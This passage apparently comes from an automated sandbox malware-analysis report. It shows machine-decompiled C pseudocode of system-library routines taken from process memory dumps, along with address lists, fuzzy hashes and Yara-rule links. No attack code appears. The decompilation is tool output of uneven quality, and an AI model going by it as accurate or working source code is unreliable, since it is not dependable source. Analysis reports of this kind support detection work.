					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E1E3E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x1e3ac608
0x1e3ac615
0x1e3ac625
0x1e3ac62d
0x1e3ac635
0x1e3ac640
0x1e3ac680
0x1e3ac687
0x1e3ac688
0x1e3ac689
0x1e3ac694
0x1e3ac694
0x1e3ac642
0x1e3ac64a
0x1e3ac697
0x1e417a25
0x1e417a2b
0x1e417a2e
0x1e417a30
0x1e417bea
0x1e417bea
0x00000000
0x1e417bea
0x1e417a36
0x1e417a43
0x1e417a48
0x1e417a4c
0x1e417a4e
0x00000000
0x00000000
0x1e417a58
0x1e417a5a
0x1e417a5b
0x1e417a5c
0x1e417a5d
0x1e417a63
0x1e417a64
0x1e417a6a
0x1e417a6c
0x1e417a6e
0x1e4179cb
0x1e4179cb
0x1e4179ce
0x1e4179d0
0x1e417a98
0x1e417a9b
0x1e417a9b
0x1e417a9e
0x1e417aa1
0x1e417bbe
0x1e417bbe
0x1e417bc0
0x1e417be0
0x1e417be0
0x1e417a01
0x1e417a01
0x1e417a05
0x1e417a07
0x1e417a15
0x1e417a15
0x1e417a1a
0x00000000
0x1e417a1a
0x1e417bc2
0x1e417bc6
0x1e417bc9
0x1e417bcd
0x1e417bcf
0x1e4179e6
0x1e4179e6
0x1e4179eb
0x1e4179eb
0x1e4179ef
0x1e4179f1
0x00000000
0x00000000
0x1e4179f3
0x1e4179f5
0x1e4179ff
0x1e4179ff
0x00000000
0x1e4179ff
0x1e4179f7
0x1e4179fd
0x00000000
0x00000000
0x00000000
0x1e4179fd
0x1e417bd5
0x1e417bd8
0x00000000
0x00000000
0x1e417ba9
0x1e417bac
0x1e417bb0
0x1e417bb1
0x1e417bb1
0x1e417bb6
0x00000000
0x1e417bb6
0x1e417aa7
0x1e417aaa
0x00000000
0x00000000
0x1e417ab2
0x1e417ab3
0x1e417ab5
0x1e417aec
0x1e417aef
0x1e417b25
0x1e417b28
0x1e417b62
0x1e417b64
0x1e417b8f
0x1e417b92
0x1e417b96
0x1e417b98
0x00000000
0x00000000
0x1e417b9e
0x1e417b9f
0x1e417ba3
0x00000000
0x1e417ba3
0x1e417b66
0x1e417b68
0x1e417ae2
0x1e417ae2
0x00000000
0x1e417ae2
0x1e417b6e
0x1e417b72
0x1e417b75
0x1e417b81
0x1e417b85
0x1e417b87
0x00000000
0x00000000
0x1e417b31
0x1e417b34
0x1e417b3c
0x1e417b45
0x1e417b46
0x1e417b4f
0x1e417b51
0x1e417b57
0x1e417b59
0x1e417b59
0x00000000
0x1e417b59
0x1e417b77
0x00000000
0x1e417b77
0x1e417b2a
0x00000000
0x1e417b2a
0x1e417af1
0x1e417af3
0x00000000
0x00000000
0x1e417afb
0x1e417afc
0x1e417afe
0x00000000
0x00000000
0x1e417b00
0x1e417b03
0x00000000
0x00000000
0x1e417b05
0x1e417b09
0x1e417b0d
0x1e417b0f
0x00000000
0x00000000
0x1e417b18
0x1e417b1d
0x00000000
0x1e417b1d
0x1e417ab7
0x1e417ab9
0x00000000
0x00000000
0x1e417abf
0x1e417ac1
0x00000000
0x00000000
0x1e417ac3
0x1e417ac6
0x00000000
0x00000000
0x1e417ac8
0x1e417acc
0x1e417ad0
0x1e417ad2
0x00000000
0x00000000
0x1e417adb
0x00000000
0x1e417adb
0x1e4179d6
0x1e4179d9
0x1e4179dc
0x1e417a91
0x1e417a94
0x00000000
0x1e417a94
0x1e4179e2
0x00000000
0x1e4179e2
0x1e417a74
0x1e417a7a
0x00000000
0x00000000
0x1e417a8a
0x1e417a21
0x1e417a21
0x00000000
0x1e417a21
0x1e3ac650
0x1e3ac651
0x1e3ac656
0x1e3ac65c
0x1e3ac65d
0x1e3ac663
0x1e3ac664
0x1e3ac66a
0x1e3ac66e
0x1e4179c5
0x1e4179c7
0x00000000
0x1e4179c7
0x1e3ac67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d188d8d3c3eb5e51c24916c1c8f801d791ec1b7eec70d938123868ec850c7bb
Instruction ID: abfc45a4c51f83ac2e6a4eaa9850cbf24b3cfd6f51dea979107f68e0154509d5
Opcode Fuzzy Hash: 7d188d8d3c3eb5e51c24916c1c8f801d791ec1b7eec70d938123868ec850c7bb
Instruction Fuzzy Hash: 5E81AA756182828BDF11CF14C894A2BB3AAEB86394F154A2BFD459F344D730FD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1E43B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E1E43B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1e497b9c; // 0x0
				_t124 = L1E3C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E1E3E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E1E3E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E1E3E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L1E3C77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E1E3E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E1E3E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1e497b9c; // 0x0
									_t92 = L1E3C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E1E3E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E1E3AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E1E43E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E1E43E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E1E3E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x1e43b8d9
0x1e43b8e4
0x00000000
0x1e43b8e6
0x1e43b8f3
0x1e43b8f5
0x1e43b8f5
0x1e43b8f8
0x1e43b920
0x1e43b924
0x1e43b936
0x1e43b939
0x1e43b93d
0x1e43b948
0x1e43b9a0
0x1e43b9a0
0x1e43b9a4
0x1e43b9bf
0x1e43b9c4
0x1e43b9c6
0x1e43b9cd
0x1e43b9d1
0x1e43bad4
0x1e43bad8
0x1e43bada
0x1e43badc
0x1e43badc
0x1e43badf
0x1e43bae0
0x1e43bae2
0x1e43bae4
0x1e43baec
0x1e43baee
0x1e43baf0
0x1e43baf0
0x1e43baec
0x1e43bafb
0x1e43bafc
0x1e43bafe
0x1e43bb01
0x1e43bb01
0x00000000
0x1e43bb06
0x1e43b9d7
0x1e43b9db
0x1e43b9db
0x1e43b9de
0x1e43b9de
0x1e43b9e4
0x1e43b9e7
0x1e43b9ea
0x1e43b9ec
0x1e43b9ef
0x1e43b9f3
0x1e43ba1b
0x1e43ba1b
0x1e43ba23
0x1e43ba24
0x1e43ba27
0x1e43ba2a
0x1e43ba2b
0x1e43ba2e
0x1e43ba30
0x1e43ba37
0x1e43ba3f
0x1e43ba9c
0x1e43baa2
0x1e43bb13
0x1e43bb15
0x1e43baae
0x1e43baae
0x1e43bab3
0x1e43bab5
0x1e43baba
0x1e43bac8
0x1e43bac8
0x1e43baba
0x1e43bacd
0x1e43bacf
0x00000000
0x1e43bacf
0x1e43bb1a
0x00000000
0x1e43bb1c
0x1e43baa7
0x1e43bb11
0x00000000
0x1e43bb11
0x1e43baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x1e43ba41
0x1e43ba41
0x1e43ba41
0x1e43ba58
0x1e43ba5d
0x1e43ba62
0x00000000
0x00000000
0x1e43ba64
0x1e43ba67
0x1e43ba68
0x1e43ba69
0x1e43ba6c
0x1e43ba6f
0x1e43ba71
0x1e43ba78
0x1e43ba80
0x00000000
0x00000000
0x1e43ba90
0x1e43ba90
0x1e43ba97
0x00000000
0x1e43ba97
0x1e43b9f5
0x1e43b9f7
0x1e43b9f7
0x1e43b9fa
0x1e43ba03
0x1e43ba07
0x1e43ba0c
0x1e43ba10
0x1e43ba17
0x00000000
0x1e43b9f7
0x1e43b9a6
0x1e43b9a8
0x1e43b9af
0x1e43b9b3
0x00000000
0x00000000
0x1e43b9b9
0x00000000
0x1e43b9b9
0x1e43b94d
0x1e43b98f
0x1e43b995
0x1e43b999
0x1e43b960
0x1e43b967
0x1e43b968
0x1e43b96a
0x00000000
0x1e43b96a
0x1e43b99b
0x1e43b99e
0x00000000
0x00000000
0x00000000
0x1e43b99e
0x1e43b951
0x1e43b954
0x1e43b95a
0x1e43b95e
0x1e43b972
0x1e43b979
0x1e43b97d
0x1e43b97f
0x1e43b980
0x1e43b982
0x1e43b984
0x00000000
0x1e43b984
0x00000000
0x1e43b926
0x00000000
0x1e43b926

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e45ed89b72190ded302fe10abac696d7f991f8119be6363c4eab52f7b789562
Instruction ID: 6291eecfebb72484146b708e91d5f92146e63c74d7f3d71aba7e68e5ff9af4a6
Opcode Fuzzy Hash: 6e45ed89b72190ded302fe10abac696d7f991f8119be6363c4eab52f7b789562
Instruction Fuzzy Hash: A3712176200B11AFD721CF15C844F56B7B6EF48722F214A2AE55687AE0DB71ED41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 1E426DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E1E426DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L1E3C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E1E426B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E1E3C7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E1E3E9AE0();
					_t87 = L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E1E42795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E1E42795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E1E42795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E1E42795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L1E3C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E1E426B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E1E426B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E1E426B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E1E426B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E1E3C7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E1E3E9AE0();
								L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L1E3C2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L1E3C2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L1E3C2400( &_v52);
							}
							if(_v28 >= 0) {
								return L1E3C2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x1e426dd4
0x1e426dde
0x1e426de1
0x1e426de3
0x1e426de6
0x1e426de9
0x1e426dec
0x1e426def
0x1e426df2
0x1e426df5
0x1e426dfe
0x1e426e04
0x1e426e09
0x1e426e0d
0x1e426e18
0x1e426e1b
0x1e426e22
0x1e426e2d
0x1e426e30
0x1e426e36
0x1e426e42
0x1e426e4d
0x1e426e50
0x1e426e55
0x1e426e5c
0x1e426e6e
0x1e426e5e
0x1e426e67
0x1e426e67
0x1e426e73
0x1e426e74
0x1e426e77
0x1e426e7c
0x1e426e7d
0x1e426e8e
0x1e426e93
0x1e426e9c
0x1e426ea8
0x1e426eab
0x1e426eac
0x1e426eb3
0x1e426ecd
0x1e426edc
0x1e426ee2
0x1e426ee5
0x1e426ef2
0x1e426efb
0x1e426f01
0x1e426f06
0x1e426f0b
0x1e426f11
0x1e426f1a
0x1e426f22
0x1e426f26
0x1e426f26
0x1e426f33
0x1e426f41
0x1e426f44
0x1e426f47
0x1e426f54
0x1e426f65
0x1e426f77
0x1e426f7c
0x1e426f82
0x1e426f91
0x1e426f99
0x1e426fa3
0x1e426fae
0x1e426fae
0x1e426fba
0x1e426fbb
0x1e426fbc
0x1e426fc1
0x1e426fc2
0x1e426fd3
0x1e426fd8
0x1e426fd8
0x1e426fdf
0x1e426fe8
0x1e426fee
0x1e426fee
0x1e426ff5
0x1e426ffb
0x1e426ffb
0x1e427004
0x00000000
0x1e42700a
0x1e427004
0x1e426eb3
0x1e426e9c
0x1e427015

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: f6791aa5d89deb4ac9ce4b706bff012b0861aa70e38b04b3e2c0642055b0388f
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 4F719E75E00259EFCB01CFA5D984AAEBBB9FF48704F10466AE905E7250DB34FA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E461002, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E461002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1e495898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x1e4958b0 = _t128;
								 *0x1e4958b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x1e4958b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x1e4958bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x1e4958bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x1e4958b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1e495898 = 7;
										return _t75;
									} else {
										 *0x1e495898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1e495898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x1e461002
0x1e46100c
0x1e46100f
0x1e461012
0x1e461018
0x00000000
0x1e46102e
0x1e461030
0x00000000
0x1e461032
0x1e461032
0x1e461038
0x1e461038
0x1e46121e
0x1e4611ff
0x1e461205
0x1e461207
0x1e46120c
0x1e46120e
0x1e461210
0x1e461212
0x1e461212
0x1e461210
0x1e46121c
0x1e46121c
0x1e461228
0x1e461228
0x1e46101c
0x1e46101c
0x1e46101c
0x1e46101f
0x1e461022
0x1e461025
0x1e46102c
0x1e46102c
0x00000000
0x1e46102c
0x1e461027
0x1e46102a
0x1e46103f
0x1e46103f
0x1e461042
0x1e461044
0x1e461047
0x1e461049
0x1e46104c
0x1e46104e
0x1e461088
0x1e461088
0x1e46108a
0x1e46108d
0x1e46108f
0x1e461091
0x1e461091
0x1e461093
0x1e461095
0x1e461097
0x1e4610c8
0x1e4610cb
0x1e4610ce
0x1e4610d0
0x1e4610f4
0x1e4610f4
0x1e4610fa
0x1e461100
0x1e461102
0x1e461150
0x1e461150
0x1e461154
0x1e461167
0x1e46116a
0x1e46116a
0x1e461156
0x1e461156
0x1e461158
0x1e46115b
0x1e46115d
0x1e46115f
0x1e46115f
0x1e46115f
0x1e461162
0x1e461162
0x1e46116c
0x1e46116f
0x1e461171
0x1e46117b
0x1e46117b
0x1e46117d
0x1e461183
0x1e461183
0x1e461186
0x1e461188
0x1e461199
0x1e46118a
0x1e46118a
0x1e46118c
0x1e46118f
0x1e461191
0x1e461191
0x1e461191
0x1e461194
0x1e461194
0x1e46119c
0x1e4611a2
0x1e4611a8
0x1e4611ac
0x1e4611af
0x1e4611c7
0x1e4611b1
0x1e4611b1
0x1e4611b4
0x1e4611b7
0x1e4611b9
0x1e4611b9
0x1e4611b9
0x1e4611bc
0x1e4611c2
0x1e4611c2
0x1e4611cb
0x1e4611ce
0x1e4611d4
0x1e4611e7
0x1e4611ed
